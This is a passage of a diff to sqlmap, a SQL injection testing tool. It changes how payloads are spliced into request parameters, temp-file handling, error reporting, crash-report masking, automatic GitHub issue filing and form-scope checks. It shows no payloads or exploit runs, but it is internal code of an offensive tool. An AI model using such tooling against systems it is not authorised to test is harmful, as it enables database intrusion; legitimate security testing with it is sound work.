match = re.search(r"([^;]+)=(?P<value>[^;]+);?\Z", origValue)
|
||||
if match:
|
||||
origValue = match.group("value")
|
||||
|
||||
if conf.prefix:
|
||||
value = origValue
|
||||
|
@ -153,9 +157,27 @@ class Agent(object):
|
|||
elif place in (PLACE.USER_AGENT, PLACE.REFERER, PLACE.HOST):
|
||||
retVal = paramString.replace(origValue, self.addPayloadDelimiters(newValue))
|
||||
else:
|
||||
retVal = re.sub(r"(\A|\b)%s=%s" % (re.escape(parameter), re.escape(origValue)), "%s=%s" % (parameter, self.addPayloadDelimiters(newValue.replace("\\", "\\\\"))), paramString)
|
||||
def _(pattern, repl, string):
|
||||
retVal = string
|
||||
match = None
|
||||
for match in re.finditer(pattern, string):
|
||||
pass
|
||||
if match:
|
||||
while True:
|
||||
_ = re.search(r"\\g<([^>]+)>", repl)
|
||||
if _:
|
||||
repl = repl.replace(_.group(0), match.group(int(_.group(1)) if _.group(1).isdigit() else _.group(1)))
|
||||
else:
|
||||
break
|
||||
retVal = string[:match.start()] + repl + string[match.end():]
|
||||
return retVal
|
||||
|
||||
if origValue:
|
||||
retVal = _(r"(\A|\b)%s=%s(\Z|\b)" % (re.escape(parameter), re.escape(origValue)), "%s=%s" % (parameter, self.addPayloadDelimiters(newValue.replace("\\", "\\\\"))), paramString)
|
||||
else:
|
||||
retVal = _(r"(\A|\b)%s=%s(\Z|%s|%s|\s)" % (re.escape(parameter), re.escape(origValue), DEFAULT_GET_POST_DELIMITER, DEFAULT_COOKIE_DELIMITER), "%s=%s\g<2>" % (parameter, self.addPayloadDelimiters(newValue.replace("\\", "\\\\"))), paramString)
|
||||
if retVal == paramString and urlencode(parameter) != parameter:
|
||||
retVal = re.sub(r"(\A|\b)%s=%s" % (re.escape(urlencode(parameter)), re.escape(origValue)), "%s=%s" % (urlencode(parameter), self.addPayloadDelimiters(newValue.replace("\\", "\\\\"))), paramString)
|
||||
retVal = _(r"(\A|\b)%s=%s" % (re.escape(urlencode(parameter)), re.escape(origValue)), "%s=%s" % (urlencode(parameter), self.addPayloadDelimiters(newValue.replace("\\", "\\\\"))), paramString)
|
||||
|
||||
return retVal
|
||||
|
||||
|
@ -987,7 +1009,7 @@ class Agent(object):
|
|||
"""
|
||||
|
||||
_ = re.escape(PAYLOAD_DELIMITER)
|
||||
return re.sub("(%s.*?%s)" % (_, _), ("%s%s%s" % (PAYLOAD_DELIMITER, payload, PAYLOAD_DELIMITER)).replace("\\", r"\\"), value) if value else value
|
||||
return re.sub("(?s)(%s.*?%s)" % (_, _), ("%s%s%s" % (PAYLOAD_DELIMITER, payload, PAYLOAD_DELIMITER)).replace("\\", r"\\"), value) if value else value
|
||||
|
||||
def runAsDBMSUser(self, query):
|
||||
if conf.dbmsCred and "Ad Hoc Distributed Queries" not in query:
|
||||
|
|
|
@ -13,6 +13,7 @@ except:
|
|||
import os
|
||||
import tempfile
|
||||
|
||||
from lib.core.exception import SqlmapSystemException
|
||||
from lib.core.settings import BIGARRAY_CHUNK_LENGTH
|
||||
|
||||
class Cache(object):
|
||||
|
@ -33,8 +34,9 @@ class BigArray(list):
|
|||
def __init__(self):
|
||||
self.chunks = [[]]
|
||||
self.cache = None
|
||||
self.length = 0
|
||||
self.filenames = set()
|
||||
self.protected = False
|
||||
self._os_remove = os.remove
|
||||
|
||||
def append(self, value):
|
||||
self.chunks[-1].append(value)
|
||||
|
@ -62,12 +64,17 @@ class BigArray(list):
|
|||
return ValueError, "%s is not in list" % value
|
||||
|
||||
def _dump(self, value):
|
||||
handle, filename = tempfile.mkstemp(prefix="sqlmapba-")
|
||||
self.filenames.add(filename)
|
||||
os.close(handle)
|
||||
with open(filename, "w+b") as fp:
|
||||
pickle.dump(value, fp, pickle.HIGHEST_PROTOCOL)
|
||||
return filename
|
||||
try:
|
||||
handle, filename = tempfile.mkstemp(prefix="sqlmapba-")
|
||||
self.filenames.add(filename)
|
||||
os.close(handle)
|
||||
with open(filename, "w+b") as fp:
|
||||
pickle.dump(value, fp, pickle.HIGHEST_PROTOCOL)
|
||||
return filename
|
||||
except IOError, ex:
|
||||
errMsg = "exception occurred while storing data "
|
||||
errMsg += "to a temporary file ('%s')" % ex
|
||||
raise SqlmapSystemException, errMsg
|
||||
|
||||
def _checkcache(self, index):
|
||||
if (self.cache and self.cache.index != index and self.cache.dirty):
|
||||
|
@ -77,6 +84,14 @@ class BigArray(list):
|
|||
with open(self.chunks[index], "rb") as fp:
|
||||
self.cache = Cache(index, pickle.load(fp), False)
|
||||
|
||||
def __getstate__(self):
|
||||
self.protected = True
|
||||
return self.chunks, self.filenames, self.protected
|
||||
|
||||
def __setstate__(self, state):
|
||||
self.__init__()
|
||||
self.chunks, self.filenames, self.protected = state
|
||||
|
||||
def __getslice__(self, i, j):
|
||||
retval = BigArray()
|
||||
i = max(0, len(self) + i if i < 0 else i)
|
||||
|
@ -119,8 +134,9 @@ class BigArray(list):
|
|||
return len(self.chunks[-1]) if len(self.chunks) == 1 else (len(self.chunks) - 1) * BIGARRAY_CHUNK_LENGTH + len(self.chunks[-1])
|
||||
|
||||
def __del__(self):
|
||||
for filename in self.filenames:
|
||||
try:
|
||||
os.remove(filename)
|
||||
except:
|
||||
pass
|
||||
if not self.protected:
|
||||
for filename in self.filenames:
|
||||
try:
|
||||
self._os_remove(filename)
|
||||
except:
|
||||
pass
|
||||
|
|
|
@ -9,8 +9,11 @@ import codecs
|
|||
import contextlib
|
||||
import cookielib
|
||||
import copy
|
||||
import getpass
|
||||
import hashlib
|
||||
import httplib
|
||||
import inspect
|
||||
import json
|
||||
import logging
|
||||
import ntpath
|
||||
import os
|
||||
|
@ -23,6 +26,7 @@ import sys
|
|||
import tempfile
|
||||
import time
|
||||
import urllib
|
||||
import urllib2
|
||||
import urlparse
|
||||
import unicodedata
|
||||
|
||||
|
@ -71,12 +75,12 @@ from lib.core.enums import PAYLOAD
|
|||
from lib.core.enums import REFLECTIVE_COUNTER
|
||||
from lib.core.enums import SORT_ORDER
|
||||
from lib.core.exception import SqlmapDataException
|
||||
from lib.core.exception import SqlmapFilePathException
|
||||
from lib.core.exception import SqlmapGenericException
|
||||
from lib.core.exception import SqlmapNoneDataException
|
||||
from lib.core.exception import SqlmapMissingDependence
|
||||
from lib.core.exception import SqlmapSilentQuitException
|
||||
from lib.core.exception import SqlmapSyntaxException
|
||||
from lib.core.exception import SqlmapSystemException
|
||||
from lib.core.exception import SqlmapUserQuitException
|
||||
from lib.core.log import LOGGER_HANDLER
|
||||
from lib.core.optiondict import optDict
|
||||
|
@ -98,6 +102,8 @@ from lib.core.settings import ERROR_PARSING_REGEXES
|
|||
from lib.core.settings import FORCE_COOKIE_EXPIRATION_TIME
|
||||
from lib.core.settings import FORM_SEARCH_REGEX
|
||||
from lib.core.settings import GENERIC_DOC_ROOT_DIRECTORY_NAMES
|
||||
from lib.core.settings import GIT_PAGE
|
||||
from lib.core.settings import GITHUB_REPORT_OAUTH_TOKEN
|
||||
from lib.core.settings import GOOGLE_ANALYTICS_COOKIE_PREFIX
|
||||
from lib.core.settings import HASHDB_MILESTONE_VALUE
|
||||
from lib.core.settings import HOST_ALIASES
|
||||
|
@ -551,6 +557,9 @@ def paramToDict(place, parameters=None):
|
|||
if len(parts) >= 2:
|
||||
parameter = urldecode(parts[0].replace(" ", ""))
|
||||
|
||||
if not parameter:
|
||||
continue
|
||||
|
||||
if conf.paramDel and conf.paramDel == '\n':
|
||||
parts[-1] = parts[-1].rstrip()
|
||||
|
||||
|
@ -560,7 +569,7 @@ def paramToDict(place, parameters=None):
|
|||
|
||||
if condition:
|
||||
testableParameters[parameter] = "=".join(parts[1:])
|
||||
if not conf.multipleTargets:
|
||||
if not conf.multipleTargets and not (conf.csrfToken and parameter == conf.csrfToken):
|
||||
_ = urldecode(testableParameters[parameter], convall=True)
|
||||
if (_.strip(DUMMY_SQL_INJECTION_CHARS) != _\
|
||||
or re.search(r'\A9{3,}', _) or re.search(DUMMY_USER_INJECTION, _))\
|
||||
|
@ -839,7 +848,7 @@ def dataToTrafficFile(data):
|
|||
except IOError, ex:
|
||||
errMsg = "something went wrong while trying "
|
||||
errMsg += "to write to the traffic file '%s' ('%s')" % (conf.trafficFile, ex)
|
||||
raise SqlmapGenericException(errMsg)
|
||||
raise SqlmapSystemException(errMsg)
|
||||
|
||||
def dataToDumpFile(dumpFile, data):
|
||||
dumpFile.write(data)
|
||||
|
@ -851,8 +860,13 @@ def dataToOutFile(filename, data):
|
|||
if data:
|
||||
retVal = os.path.join(conf.filePath, filePathToSafeString(filename))
|
||||
|
||||
with codecs.open(retVal, "wb", UNICODE_ENCODING) as f:
|
||||
f.write(data)
|
||||
try:
|
||||
with codecs.open(retVal, "wb", UNICODE_ENCODING) as f:
|
||||
f.write(data)
|
||||
except IOError, ex:
|
||||
errMsg = "something went wrong while trying to write "
|
||||
errMsg += "to the output file ('%s')" % ex
|
||||
raise SqlmapGenericException(errMsg)
|
||||
|
||||
return retVal
|
||||
|
||||
|
@ -875,7 +889,7 @@ def readInput(message, default=None, checkBatch=True):
|
|||
message = "\n%s" % message
|
||||
kb.prependFlag = False
|
||||
|
||||
if conf.answers:
|
||||
if conf.get("answers"):
|
||||
for item in conf.answers.split(','):
|
||||
question = item.split('=')[0].strip()
|
||||
answer = item.split('=')[1] if len(item.split('=')) > 1 else None
|
||||
|
@ -891,7 +905,7 @@ def readInput(message, default=None, checkBatch=True):
|
|||
break
|
||||
|
||||
if retVal is None:
|
||||
if checkBatch and conf.batch:
|
||||
if checkBatch and conf.get("batch"):
|
||||
if isListLike(default):
|
||||
options = ",".join(getUnicode(opt, UNICODE_ENCODING) for opt in default)
|
||||
elif default:
|
||||
|
@ -912,7 +926,7 @@ def readInput(message, default=None, checkBatch=True):
|
|||
|
||||
try:
|
||||
retVal = raw_input() or default
|
||||
retVal = getUnicode(retVal, system=True) if retVal else retVal
|
||||
retVal = getUnicode(retVal, encoding=sys.stdin.encoding) if retVal else retVal
|
||||
except:
|
||||
time.sleep(0.05) # Reference: http://www.gossamer-threads.com/lists/python/python/781893
|
||||
kb.prependFlag = True
|
||||
|
@ -981,11 +995,23 @@ def sanitizeStr(value):
|
|||
|
||||
def checkFile(filename):
|
||||
"""
|
||||
Checks for file existence
|
||||
Checks for file existence and readability
|
||||
"""
|
||||
|
||||
if not os.path.isfile(filename):
|
||||
raise SqlmapFilePathException("unable to read file '%s'" % filename)
|
||||
valid = True
|
||||
|
||||
if filename is None or not os.path.isfile(filename):
|
||||
valid = False
|
||||
|
||||
if valid:
|
||||
try:
|
||||
with open(filename, "rb") as f:
|
||||
pass
|
||||
except:
|
||||
valid = False
|
||||
|
||||
if not valid:
|
||||
raise SqlmapSystemException("unable to read file '%s'" % filename)
|
||||
|
||||
def banner():
|
||||
"""
|
||||
|
@ -1053,14 +1079,15 @@ def setPaths():
|
|||
paths.SQLMAP_XML_BANNER_PATH = os.path.join(paths.SQLMAP_XML_PATH, "banner")
|
||||
|
||||
_ = os.path.join(os.path.expanduser("~"), ".sqlmap")
|
||||
paths.SQLMAP_OUTPUT_PATH = getUnicode(paths.get("SQLMAP_OUTPUT_PATH", os.path.join(_, "output")), system=True)
|
||||
paths.SQLMAP_OUTPUT_PATH = getUnicode(paths.get("SQLMAP_OUTPUT_PATH", os.path.join(_, "output")), encoding=sys.getfilesystemencoding())
|
||||
paths.SQLMAP_DUMP_PATH = os.path.join(paths.SQLMAP_OUTPUT_PATH, "%s", "dump")
|
||||
paths.SQLMAP_FILES_PATH = os.path.join(paths.SQLMAP_OUTPUT_PATH, "%s", "files")
|
||||
|
||||
# sqlmap files
|
||||
paths.SQL_SHELL_HISTORY = os.path.join(_, "sql.hst")
|
||||
paths.OS_SHELL_HISTORY = os.path.join(_, "os.hst")
|
||||
paths.SQL_SHELL_HISTORY = os.path.join(_, "sql.hst")
|
||||
paths.SQLMAP_SHELL_HISTORY = os.path.join(_, "sqlmap.hst")
|
||||
paths.GITHUB_HISTORY = os.path.join(_, "github.hst")
|
||||
paths.SQLMAP_CONFIG = os.path.join(paths.SQLMAP_ROOT_PATH, "sqlmap-%s.conf" % randomStr())
|
||||
paths.COMMON_COLUMNS = os.path.join(paths.SQLMAP_TXT_PATH, "common-columns.txt")
|
||||
paths.COMMON_TABLES = os.path.join(paths.SQLMAP_TXT_PATH, "common-tables.txt")
|
||||
|
@ -1071,7 +1098,6 @@ def setPaths():
|
|||
paths.WORDLIST = os.path.join(paths.SQLMAP_TXT_PATH, "wordlist.zip")
|
||||
paths.ERRORS_XML = os.path.join(paths.SQLMAP_XML_PATH, "errors.xml")
|
||||
paths.PAYLOADS_XML = os.path.join(paths.SQLMAP_XML_PATH, "payloads.xml")
|
||||
paths.INJECTIONS_XML = os.path.join(paths.SQLMAP_XML_PATH, "injections.xml")
|
||||
paths.LIVE_TESTS_XML = os.path.join(paths.SQLMAP_XML_PATH, "livetests.xml")
|
||||
paths.QUERIES_XML = os.path.join(paths.SQLMAP_XML_PATH, "queries.xml")
|
||||
paths.GENERIC_XML = os.path.join(paths.SQLMAP_XML_BANNER_PATH, "generic.xml")
|
||||
|
@ -1080,6 +1106,10 @@ def setPaths():
|
|||
paths.ORACLE_XML = os.path.join(paths.SQLMAP_XML_BANNER_PATH, "oracle.xml")
|
||||
paths.PGSQL_XML = os.path.join(paths.SQLMAP_XML_BANNER_PATH, "postgresql.xml")
|
||||
|
||||
for path in paths.values():
|
||||
if any(path.endswith(_) for _ in (".txt", ".xml", ".zip")):
|
||||
checkFile(path)
|
||||
|
||||
def weAreFrozen():
|
||||
"""
|
||||
Returns whether we are frozen via py2exe.
|
||||
|
@ -1210,7 +1240,14 @@ def parseTargetUrl():
|
|||
if CUSTOM_INJECTION_MARK_CHAR in conf.url:
|
||||
conf.url = conf.url.replace('?', URI_QUESTION_MARKER)
|
||||
|
||||
urlSplit = urlparse.urlsplit(conf.url)
|
||||
try:
|
||||
urlSplit = urlparse.urlsplit(conf.url)
|
||||
except ValueError, ex:
|
||||
errMsg = "invalid URL '%s' has been given ('%s'). " % (conf.url, ex)
|
||||
errMsg += "Please be sure that you don't have any leftover characters (e.g. '[' or ']') "
|
||||
errMsg += "in the hostname part"
|
||||
raise SqlmapGenericException(errMsg)
|
||||
|
||||
hostnamePort = urlSplit.netloc.split(":") if not re.search("\[.+\]", urlSplit.netloc) else filter(None, (re.search("\[.+\]", urlSplit.netloc).group(0), re.search("\](:(?P<port>\d+))?", urlSplit.netloc).group("port")))
|
||||
|
||||
conf.scheme = urlSplit.scheme.strip().lower() if not conf.forceSSL else "https"
|
||||
|
@ -1281,7 +1318,7 @@ def expandAsteriskForColumns(expression):
|
|||
if expression != conf.query:
|
||||
conf.db = db
|
||||
else:
|
||||
expression = re.sub(r"([^\w])%s" % conf.tbl, "\g<1>%s.%s" % (conf.db, conf.tbl), expression)
|
||||
expression = re.sub(r"([^\w])%s" % re.escape(conf.tbl), "\g<1>%s.%s" % (conf.db, conf.tbl), expression)
|
||||
else:
|
||||
conf.db = db
|
||||
conf.db = safeSQLIdentificatorNaming(conf.db)
|
||||
|
@ -1519,29 +1556,30 @@ def safeStringFormat(format_, params):
|
|||
|
||||
if format_.count(PAYLOAD_DELIMITER) == 2:
|
||||
_ = format_.split(PAYLOAD_DELIMITER)
|
||||
_[1] = _[1].replace("%d", "%s")
|
||||
_[1] = re.sub(r"(\A|[^A-Za-z0-9])(%d)([^A-Za-z0-9]|\Z)", r"\g<1>%s\g<3>", _[1])
|
||||
retVal = PAYLOAD_DELIMITER.join(_)
|
||||
else:
|
||||
retVal = format_.replace("%d", "%s")
|
||||
retVal = re.sub(r"(\A|[^A-Za-z0-9])(%d)([^A-Za-z0-9]|\Z)", r"\g<1>%s\g<3>", format_)
|
||||
|
||||
if isinstance(params, basestring):
|
||||
retVal = retVal.replace("%s", params, 1)
|
||||
elif not isListLike(params):
|
||||
retVal = retVal.replace("%s", str(params), 1)
|
||||
else:
|
||||
count, index = 0, 0
|
||||
if retVal.count("%s") == len(params):
|
||||
while index != -1:
|
||||
index = retVal.find("%s")
|
||||
if index != -1:
|
||||
retVal = retVal[:index] + getUnicode(params[count]) + retVal[index + 2:]
|
||||
count += 1
|
||||
start, end = 0, len(retVal)
|
||||
match = re.search(r"%s(.+)%s" % (PAYLOAD_DELIMITER, PAYLOAD_DELIMITER), retVal)
|
||||
if match and PAYLOAD_DELIMITER not in match.group(1):
|
||||
start, end = match.start(), match.end()
|
||||
if retVal.count("%s", start, end) == len(params):
|
||||
for param in params:
|
||||
index = retVal.find("%s", start)
|
||||
retVal = retVal[:index] + getUnicode(param) + retVal[index + 2:]
|
||||
else:
|
||||
count = 0
|
||||
while True:
|
||||
match = re.search(r"(\A|[^A-Za-z0-9])(%s)([^A-Za-z0-9]|\Z)", retVal)
|
||||
if match:
|
||||
if count > len(params):
|
||||
if count >= len(params):
|
||||
raise Exception("wrong number of parameters during string formatting")
|
||||
else:
|
||||
retVal = re.sub(r"(\A|[^A-Za-z0-9])(%s)([^A-Za-z0-9]|\Z)", r"\g<1>%s\g<3>" % params[count], retVal, 1)
|
||||
|
@ -1679,7 +1717,11 @@ def getConsoleWidth(default=80):
|
|||
width = int(os.getenv("COLUMNS"))
|
||||
else:
|
||||
try:
|
||||
process = execute("stty size", shell=True, stdout=PIPE, stderr=PIPE)
|
||||
try:
|
||||
FNULL = open(os.devnull, 'w')
|
||||
except IOError:
|
||||
FNULL = None
|
||||
process = execute("stty size", shell=True, stdout=PIPE, stderr=FNULL or PIPE)
|
||||
stdout, _ = process.communicate()
|
||||
items = stdout.split()
|
||||
|
||||
|
@ -1862,31 +1904,36 @@ def getFileItems(filename, commentPrefix='#', unicode_=True, lowercase=False, un
|
|||
|
||||
checkFile(filename)
|
||||
|
||||
with codecs.open(filename, 'r', UNICODE_ENCODING, errors="ignore") if unicode_ else open(filename, 'r') as f:
|
||||
for line in (f.readlines() if unicode_ else f.xreadlines()): # xreadlines doesn't return unicode strings when codec.open() is used
|
||||
if commentPrefix:
|
||||
if line.find(commentPrefix) != -1:
|
||||
line = line[:line.find(commentPrefix)]
|
||||
try:
|
||||
with codecs.open(filename, 'r', UNICODE_ENCODING, errors="ignore") if unicode_ else open(filename, 'r') as f:
|
||||
for line in (f.readlines() if unicode_ else f.xreadlines()): # xreadlines doesn't return unicode strings when codec.open() is used
|
||||
if commentPrefix:
|
||||
if line.find(commentPrefix) != -1:
|
||||
line = line[:line.find(commentPrefix)]
|
||||
|
||||
line = line.strip()
|
||||
line = line.strip()
|
||||
|
||||
if not unicode_:
|
||||
try:
|
||||
line = str.encode(line)
|
||||
except UnicodeDecodeError:
|
||||
continue
|
||||
if not unicode_:
|
||||
try:
|
||||
line = str.encode(line)
|
||||
except UnicodeDecodeError:
|
||||
continue
|
||||
|
||||
if line:
|
||||
if lowercase:
|
||||
line = line.lower()
|
||||
if line:
|
||||
if lowercase:
|
||||
line = line.lower()
|
||||
|
||||
if unique and line in retVal:
|
||||
continue
|
||||
if unique and line in retVal:
|
||||
continue
|
||||
|
||||
if unique:
|
||||
retVal[line] = True
|
||||
else:
|
||||
retVal.append(line)
|
||||
if unique:
|
||||
retVal[line] = True
|
||||
else:
|
||||
retVal.append(line)
|
||||
except (IOError, OSError, MemoryError), ex:
|
||||
errMsg = "something went wrong while trying "
|
||||
errMsg += "to read the content of file '%s' ('%s')" % (filename, ex)
|
||||
raise SqlmapSystemException(errMsg)
|
||||
|
||||
return retVal if not unique else retVal.keys()
|
||||
|
||||
|
@ -1995,7 +2042,7 @@ def getPartRun(alias=True):
|
|||
else:
|
||||
return retVal
|
||||
|
||||
def getUnicode(value, encoding=None, system=False, noneToNull=False):
|
||||
def getUnicode(value, encoding=None, noneToNull=False):
|
||||
"""
|
||||
Return the unicode representation of the supplied value:
|
||||
|
||||
|
@ -2011,28 +2058,22 @@ def getUnicode(value, encoding=None, system=False, noneToNull=False):
|
|||
return NULL
|
||||
|
||||
if isListLike(value):
|
||||
value = list(getUnicode(_, encoding, system, noneToNull) for _ in value)
|
||||
value = list(getUnicode(_, encoding, noneToNull) for _ in value)
|
||||
return value
|
||||
|
||||
if not system:
|
||||
if isinstance(value, unicode):
|
||||
return value
|
||||
elif isinstance(value, basestring):
|
||||
while True:
|
||||
try:
|
||||
return unicode(value, encoding or kb.get("pageEncoding") or UNICODE_ENCODING)
|
||||
except UnicodeDecodeError, ex:
|
||||
value = value[:ex.start] + "".join(INVALID_UNICODE_CHAR_FORMAT % ord(_) for _ in value[ex.start:ex.end]) + value[ex.end:]
|
||||
else:
|
||||
if isinstance(value, unicode):
|
||||
return value
|
||||
elif isinstance(value, basestring):
|
||||
while True:
|
||||
try:
|
||||
return unicode(value)
|
||||
except UnicodeDecodeError:
|
||||
return unicode(str(value), errors="ignore") # encoding ignored for non-basestring instances
|
||||
return unicode(value, encoding or kb.get("pageEncoding") or UNICODE_ENCODING)
|
||||
except UnicodeDecodeError, ex:
|
||||
value = value[:ex.start] + "".join(INVALID_UNICODE_CHAR_FORMAT % ord(_) for _ in value[ex.start:ex.end]) + value[ex.end:]
|
||||
else:
|
||||
try:
|
||||
return getUnicode(value, sys.getfilesystemencoding() or sys.stdin.encoding)
|
||||
except:
|
||||
return getUnicode(value, UNICODE_ENCODING)
|
||||
return unicode(value)
|
||||
except UnicodeDecodeError:
|
||||
return unicode(str(value), errors="ignore") # encoding ignored for non-basestring instances
|
||||
|
||||
def longestCommonPrefix(*sequences):
|
||||
"""
|
||||
|
@ -2498,11 +2539,11 @@ def removeDynamicContent(page):
|
|||
if prefix is None and suffix is None:
|
||||
continue
|
||||
elif prefix is None:
|
||||
page = re.sub(r'(?s)^.+%s' % suffix, suffix, page)
|
||||
page = re.sub(r'(?s)^.+%s' % re.escape(suffix), suffix, page)
|
||||
elif suffix is None:
|
||||
page = re.sub(r'(?s)%s.+$' % prefix, prefix, page)
|
||||
page = re.sub(r'(?s)%s.+$' % re.escape(prefix), prefix, page)
|
||||
else:
|
||||
page = re.sub(r'(?s)%s.+%s' % (prefix, suffix), '%s%s' % (prefix, suffix), page)
|
||||
page = re.sub(r'(?s)%s.+%s' % (re.escape(prefix), re.escape(suffix)), '%s%s' % (prefix, suffix), page)
|
||||
|
||||
return page
|
||||
|
||||
|
@ -2793,7 +2834,7 @@ def openFile(filename, mode='r'):
|
|||
errMsg += "Please check %s permissions on a file " % ("write" if \
|
||||
mode and ('w' in mode or 'a' in mode or '+' in mode) else "read")
|
||||
errMsg += "and that it's not locked by another process."
|
||||
raise SqlmapFilePathException(errMsg)
|
||||
raise SqlmapSystemException(errMsg)
|
||||
|
||||
def decodeIntToUnicode(value):
|
||||
"""
|
||||
|
@ -2808,14 +2849,11 @@ def decodeIntToUnicode(value):
|
|||
|
||||
if isinstance(value, int):
|
||||
try:
|
||||
# http://dev.mysql.com/doc/refman/5.0/en/string-functions.html#function_ord
|
||||
if Backend.getIdentifiedDbms() in (DBMS.MYSQL,):
|
||||
if value > 255:
|
||||
_ = "%x" % value
|
||||
if len(_) % 2 == 1:
|
||||
_ = "0%s" % _
|
||||
retVal = getUnicode(hexdecode(_))
|
||||
elif value > 255:
|
||||
retVal = unichr(value)
|
||||
retVal = getUnicode(hexdecode(_), encoding="UTF-16" if Backend.isDbms(DBMS.MSSQL) else None)
|
||||
else:
|
||||
retVal = getUnicode(chr(value))
|
||||
except:
|
||||
|
@ -2828,21 +2866,81 @@ def unhandledExceptionMessage():
|
|||
Returns detailed message about occurred unhandled exception
|
||||
"""
|
||||
|
||||
errMsg = "unhandled exception in %s, retry your " % VERSION_STRING
|
||||
errMsg += "run with the latest development version from the GitHub "
|
||||
errMsg += "repository. If the exception persists, please send by e-mail "
|
||||
errMsg += "to '%s' or open a new issue at '%s' with the following text " % (ML, ISSUES_PAGE)
|
||||
errMsg += "and any information required to reproduce the bug. The "
|
||||
errMsg = "unhandled exception occurred in %s. It is recommended to retry your " % VERSION_STRING
|
||||
errMsg += "run with the latest development version from official GitHub "
|
||||
errMsg += "repository at '%s'. If the exception persists, please open a new issue " % GIT_PAGE
|
||||
errMsg += "at '%s' (or less preferably send by e-mail to '%s') " % (ISSUES_PAGE, ML)
|
||||
errMsg += "with the following text and any other information required to "
|
||||
errMsg += "reproduce the bug. The "
|
||||
errMsg += "developers will try to reproduce the bug, fix it accordingly "
|
||||
errMsg += "and get back to you.\n"
|
||||
errMsg += "sqlmap version: %s%s\n" % (VERSION, "-%s" % REVISION if REVISION else "")
|
||||
errMsg += "and get back to you\n"
|
||||
errMsg += "sqlmap version: %s\n" % VERSION_STRING[VERSION_STRING.find('/') + 1:]
|
||||
errMsg += "Python version: %s\n" % PYVERSION
|
||||
errMsg += "Operating system: %s\n" % PLATFORM
|
||||
errMsg += "Command line: %s\n" % " ".join(sys.argv)
|
||||
errMsg += "Command line: %s\n" % re.sub(r".+?\bsqlmap.py\b", "sqlmap.py", " ".join(sys.argv))
|
||||
errMsg += "Technique: %s\n" % (enumValueToNameLookup(PAYLOAD.TECHNIQUE, kb.technique) if kb.get("technique") else ("DIRECT" if conf.get("direct") else None))
|
||||
errMsg += "Back-end DBMS: %s" % ("%s (fingerprinted)" % Backend.getDbms() if Backend.getDbms() is not None else "%s (identified)" % Backend.getIdentifiedDbms())
|
||||
|
||||
return maskSensitiveData(errMsg)
|
||||
return errMsg
|
||||
|
||||
def createGithubIssue(errMsg, excMsg):
|
||||
"""
|
||||
Automatically create a Github issue with unhandled exception information
|
||||
"""
|
||||
|
||||
issues = []
|
||||
try:
|
||||
issues = getFileItems(paths.GITHUB_HISTORY, unique=True)
|
||||
except:
|
||||
pass
|
||||
finally:
|
||||
issues = set(issues)
|
||||
|
||||
_ = re.sub(r"'[^']+'", "''", excMsg)
|
||||
_ = re.sub(r"\s+line \d+", "", _)
|
||||
_ = re.sub(r'File ".+?/(\w+\.py)', "\g<1>", _)
|
||||
key = hashlib.md5(_).hexdigest()[:8]
|
||||
|
||||
if key in issues:
|
||||
return
|
||||
|
||||
msg = "\ndo you want to automatically create a new (anonymized) issue "
|
||||
msg += "with the unhandled exception information at "
|
||||
msg += "the official Github repository? [y/N] "
|
||||
try:
|
||||
test = readInput(msg, default="N")
|
||||
except:
|
||||
test = None
|
||||
|
||||
if test and test[0] in ("y", "Y"):
|
||||
ex = None
|
||||
errMsg = errMsg[errMsg.find("\n"):]
|
||||
|
||||
|
||||
data = {"title": "Unhandled exception (#%s)" % key, "body": "```%s\n```\n```\n%s```" % (errMsg, excMsg)}
|
||||
req = urllib2.Request(url="https://api.github.com/repos/sqlmapproject/sqlmap/issues", data=json.dumps(data), headers={"Authorization": "token %s" % GITHUB_REPORT_OAUTH_TOKEN})
|
||||
|
||||
try:
|
||||
f = urllib2.urlopen(req)
|
||||
content = f.read()
|
||||
except Exception, ex:
|
||||
content = None
|
||||
|
||||
issueUrl = re.search(r"https://github.com/sqlmapproject/sqlmap/issues/\d+", content or "")
|
||||
if issueUrl:
|
||||
infoMsg = "created Github issue can been found at the address '%s'" % issueUrl.group(0)
|
||||
logger.info(infoMsg)
|
||||
|
||||
try:
|
||||
with open(paths.GITHUB_HISTORY, "a+b") as f:
|
||||
f.write("%s\n" % key)
|
||||
except:
|
||||
pass
|
||||
else:
|
||||
warnMsg = "something went wrong while creating a Github issue"
|
||||
if ex:
|
||||
warnMsg += " ('%s')" % ex
|
||||
logger.warn(warnMsg)
|
||||
|
||||
def maskSensitiveData(msg):
|
||||
"""
|
||||
|
@ -2857,6 +2955,15 @@ def maskSensitiveData(msg):
|
|||
value = extractRegexResult(regex, retVal)
|
||||
retVal = retVal.replace(value, '*' * len(value))
|
||||
|
||||
if not conf.get("hostname"):
|
||||
match = re.search(r"(?i)sqlmap.+(-u|--url)\s+([^ ]+)", retVal)
|
||||
if match:
|
||||
retVal = retVal.replace(match.group(2), '*' * len(match.group(2)))
|
||||
|
||||
|
||||
if getpass.getuser():
|
||||
retVal = re.sub(r"(?i)\b%s\b" % re.escape(getpass.getuser()), "*" * len(getpass.getuser()), retVal)
|
||||
|
||||
return retVal
|
||||
|
||||
def listToStrValue(value):
|
||||
|
@ -2931,7 +3038,7 @@ def removeReflectiveValues(content, payload, suppressWarning=False):
|
|||
|
||||
retVal = content
|
||||
|
||||
if all([content, payload]) and isinstance(content, unicode) and kb.reflectiveMechanism:
|
||||
if all([content, payload]) and isinstance(content, unicode) and kb.reflectiveMechanism and not kb.heuristicMode:
|
||||
def _(value):
|
||||
while 2 * REFLECTED_REPLACEMENT_REGEX in value:
|
||||
value = value.replace(2 * REFLECTED_REPLACEMENT_REGEX, REFLECTED_REPLACEMENT_REGEX)
|
||||
|
@ -2966,7 +3073,7 @@ def removeReflectiveValues(content, payload, suppressWarning=False):
|
|||
regex = REFLECTED_REPLACEMENT_REGEX.join(parts[1:])
|
||||
retVal = re.sub(r"(?i)\b%s\b" % regex, REFLECTED_VALUE_MARKER, retVal)
|
||||
|
||||
if retVal != content and not kb.heuristicMode:
|
||||
if retVal != content:
|
||||
kb.reflectiveCounters[REFLECTIVE_COUNTER.HIT] += 1
|
||||
if not suppressWarning:
|
||||
warnMsg = "reflective value(s) found and filtering out"
|
||||
|
@ -3392,8 +3499,17 @@ def findPageForms(content, url, raise_=False, addToTargets=False):
|
|||
logger.debug(debugMsg)
|
||||
continue
|
||||
|
||||
target = (url, method, data, conf.cookie)
|
||||
retVal.add(target)
|
||||
# flag to know if we are dealing with the same target host
|
||||
_ = reduce(lambda x, y: x == y, map(lambda x: urlparse.urlparse(x).netloc.split(':')[0], (response.geturl(), url)))
|
||||
|
||||
if conf.scope:
|
||||
if not re.search(conf.scope, url, re.I):
|
||||
continue
|
||||
elif not _:
|
||||
continue
|
||||
else:
|
||||
